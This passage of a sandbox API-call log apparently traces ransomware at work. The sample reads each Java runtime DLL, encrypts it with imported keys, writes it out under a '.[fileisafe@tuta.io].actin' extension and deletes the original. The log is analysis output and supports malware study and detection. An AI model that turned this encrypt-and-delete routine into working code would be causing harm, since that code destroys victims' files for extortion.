liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.434] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.435] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3070) returned 1 [0150.435] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.435] ReadFile (in: hFile=0x2e4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x26a40, lpOverlapped=0x0) returned 1 [0150.439] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x26a50, dwBufLen=0x26a50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x26a50) returned 1 [0150.439] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x26a50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x26a50, lpOverlapped=0x0) returned 1 [0150.443] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d30) returned 1 [0150.443] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.443] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.443] CryptDestroyKey (hKey=0xac2d30) returned 1 [0150.443] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.443] CryptDestroyKey (hKey=0xac3070) returned 1 [0150.443] CloseHandle (hObject=0x2e4) returned 1 [0150.443] CloseHandle (hObject=0x2ec) returned 1 [0150.443] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 1 [0150.445] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.445] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=123456) returned 1 [0150.445] CloseHandle (hObject=0x2ec) returned 1 [0150.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll")) returned 0x20 [0150.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.446] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.446] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.446] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0150.446] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.446] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x1e240, lpOverlapped=0x0) returned 1 [0150.450] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x1e250, dwBufLen=0x1e250 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x1e250) returned 1 [0150.450] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x1e250, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x1e250, lpOverlapped=0x0) returned 1 [0150.452] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2e70) returned 1 [0150.452] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.452] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.452] CryptDestroyKey (hKey=0xac2e70) returned 1 [0150.452] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.452] CryptDestroyKey (hKey=0xac3170) returned 1 [0150.452] CloseHandle (hObject=0x2ec) returned 1 [0150.452] CloseHandle (hObject=0x2e4) returned 1 [0150.453] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll")) returned 1 [0150.454] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.455] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19008) returned 1 [0150.455] CloseHandle (hObject=0x2e4) returned 1 [0150.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll")) returned 0x20 [0150.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.455] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.456] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.456] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3370) returned 1 [0150.456] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.456] ReadFile (in: hFile=0x2e4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4a40, lpOverlapped=0x0) returned 1 [0150.458] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4a50, dwBufLen=0x4a50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4a50) returned 1 [0150.458] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4a50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4a50, lpOverlapped=0x0) returned 1 [0150.459] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3170) returned 1 [0150.459] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.459] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.459] CryptDestroyKey (hKey=0xac3170) returned 1 [0150.459] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.459] CryptDestroyKey (hKey=0xac3370) returned 1 [0150.459] CloseHandle (hObject=0x2e4) returned 1 [0150.459] CloseHandle (hObject=0x2ec) returned 1 [0150.459] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll")) returned 1 [0150.460] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.461] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=63552) returned 1 [0150.461] CloseHandle (hObject=0x2ec) returned 1 [0150.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll")) returned 0x20 [0150.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.461] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.461] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.461] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0150.461] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xf840, lpOverlapped=0x0) returned 1 [0150.464] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xf850, dwBufLen=0xf850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xf850) returned 1 [0150.464] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf850, lpOverlapped=0x0) returned 1 [0150.466] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2db0) returned 1 [0150.466] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.466] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.466] CryptDestroyKey (hKey=0xac2db0) returned 1 [0150.466] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.466] CryptDestroyKey (hKey=0xac2d70) returned 1 [0150.466] CloseHandle (hObject=0x2ec) returned 1 [0150.466] CloseHandle (hObject=0x2e4) returned 1 [0150.466] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll")) returned 1 [0150.467] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.467] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=21056) returned 1 [0150.468] CloseHandle (hObject=0x2e4) returned 1 [0150.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll")) returned 0x20 [0150.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.468] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.468] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.468] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32b0) returned 1 [0150.468] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.468] ReadFile (in: hFile=0x2e4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x5240, lpOverlapped=0x0) returned 1 [0150.692] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x5250, dwBufLen=0x5250 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x5250) returned 1 [0150.692] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x5250, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x5250, lpOverlapped=0x0) returned 1 [0150.693] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3430) returned 1 [0150.693] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.693] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.693] CryptDestroyKey (hKey=0xac3430) returned 1 [0150.693] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.693] CryptDestroyKey (hKey=0xac32b0) returned 1 [0150.693] CloseHandle (hObject=0x2e4) returned 1 [0150.693] CloseHandle (hObject=0x2ec) returned 1 [0150.694] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll")) returned 1 [0150.695] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.696] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=142400) returned 1 [0150.696] CloseHandle (hObject=0x2ec) returned 1 [0150.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll")) returned 0x20 [0150.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0150.696] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.696] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.038] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0151.038] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.038] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x22c40, lpOverlapped=0x0) returned 1 [0151.042] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x22c50, dwBufLen=0x22c50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x22c50) returned 1 [0151.042] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x22c50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x22c50, lpOverlapped=0x0) returned 1 [0151.045] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3070) returned 1 [0151.045] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.045] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0151.045] CryptDestroyKey (hKey=0xac3070) returned 1 [0151.045] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0151.045] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.045] CloseHandle (hObject=0x2ec) returned 1 [0151.045] CloseHandle (hObject=0x2e0) returned 1 [0151.045] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll")) returned 1 [0151.047] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.048] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=187392) returned 1 [0151.048] CloseHandle (hObject=0x2e0) returned 1 